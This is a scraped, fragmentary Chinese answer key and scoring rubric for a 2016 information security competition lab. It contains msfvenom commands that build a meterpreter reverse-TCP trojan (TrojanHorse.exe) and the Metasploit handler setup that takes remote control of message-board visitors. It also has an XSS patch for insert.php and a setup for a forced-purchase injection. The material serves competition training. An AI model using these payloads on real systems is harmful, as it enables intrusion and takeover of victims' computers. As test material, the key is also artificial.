第一范文网 - 专业文章范例文档资料分享平台

2016信息安全管理与评估赛项赛题与评分标准—第二阶段答案及评分标准

来源:用户分享 时间:2025/5/15 8:46:16 本文由loading 分享 下载这篇文档手机版
说明:文章内容仅供预览,部分内容可能不全,需要完整文档或者需要复制内容,请下载word后使用。下载word有问题请添加微信号:xxxxxxx或QQ:xxxxxx 处理(尽可能给您提供完整文档),感谢您的支持与谅解。

文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.

正向查找区域:主机(截图) Zone:Org 主机:hacker

Metasploit Framework:TrojanHorse.exe生成 (3分) root@bt:~#Ifconfig (截图)

显示Kali IP地址:

截图包含:

root@bt:~#msfvenom –p windows/meterpreter/reverse_tcp LHOST= LPORT=80 –f exe –o trojanhorse.exe

5. 当\ Employee Message Board\页面的访问者执行网站()中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程控制,打开访问者主机的CMD.exe命令行窗口,并将该操作过程截图;(5分)

11

文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.

Metasploit Framework:Hacker Reverse Tcp连接客户端 (2分)

root@bt:~#msfconsole

msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST LHOST =>

msf exploit(handler) > set LPORT 80 LPORT => 80

msf exploit(handler) > exploit [*] Started reverse handler on [*] Starting the payload handler... (截图中包含黄色部分)

访问者主机需要被Kali主机远程控制(3分) Kali MSF提示(截图)包含如下信息 Kali IP: 访问者主机IP:

[*] Sending stage (…… bytes) to

[*] Meterpreter session 1 opened ( -> at …… meterpreter >

12

文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.

Kali截图包含打开访问者主机的CMD.exe命令行窗口;

6. 进入DCST中的WebServ2003服务器的C:\\AppServ\\www目录,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS渗透测试,并将修改后的PHP源程序截图;(10分) (10分)

在服务器场景原insert.php程序语句$info=$_REQUEST[‘message’]后加入:

绿色部分,通过替换函数,通过其它字符({},(),[]等字符)替换字符“<”和“>”均可得分; $info=str_replace(“<”,”(”,$info); $info=str_replace(“>”,”)”,$info); 或

$info=str_replace(“<”,”{”,$info); $info=str_replace(“>”,” }”,$info); 或

$info=str_replace(“<”,”[”,$info);

13

文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.

$info=str_replace(“>”,” ]”,$info);

7. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效,并将验证过程截图;(5分)

SQL Server企业管理器中,Message表中info字段注入语句符号“<”和“>”被替换为上一题替换后的字符;同时Communication Message页面显示Content:注入语句符号“<”和“>”被替换为上一题替换后的字符; (5分)

8. Web访问DCST中的WebServ2003服务器,\ Shopping Hall\,分析该页面源程序,找到提交的变量名,并截图;(5分)

找到源程序:(2分)

14

文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.

页面标题为:

Shopping Hall

找到提交的变量名:(3分) goods=keyboard&quantity=1 goods=mouse&quantity=1 goods=monitor&quantity=1 goods=cpu&quantity=1 goods=memory&quantity=1 goods=dvdrom&quantity=1

9. 对该任务题目1页面注入点进行渗透测试,使\ Employee Message Board\页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看\页面,并将注入代码及测试过程截图;(5分) 构造注入代码:(2分)

2016信息安全管理与评估赛项赛题与评分标准—第二阶段答案及评分标准.doc 将本文的Word文档下载到电脑,方便复制、编辑、收藏和打印
本文链接:https://www.diyifanwen.net/c8od5i96kh36h1tx45d7638ccg96n4k006z4_3.html(转载请注明文章来源)
热门推荐
Copyright © 2012-2023 第一范文网 版权所有 免责声明 | 联系我们
声明 :本网站尊重并保护知识产权,根据《信息网络传播权保护条例》,如果我们转载的作品侵犯了您的权利,请在一个月内通知我们,我们会及时删除。
客服QQ:xxxxxx 邮箱:xxxxxx@qq.com
渝ICP备2023013149号
Top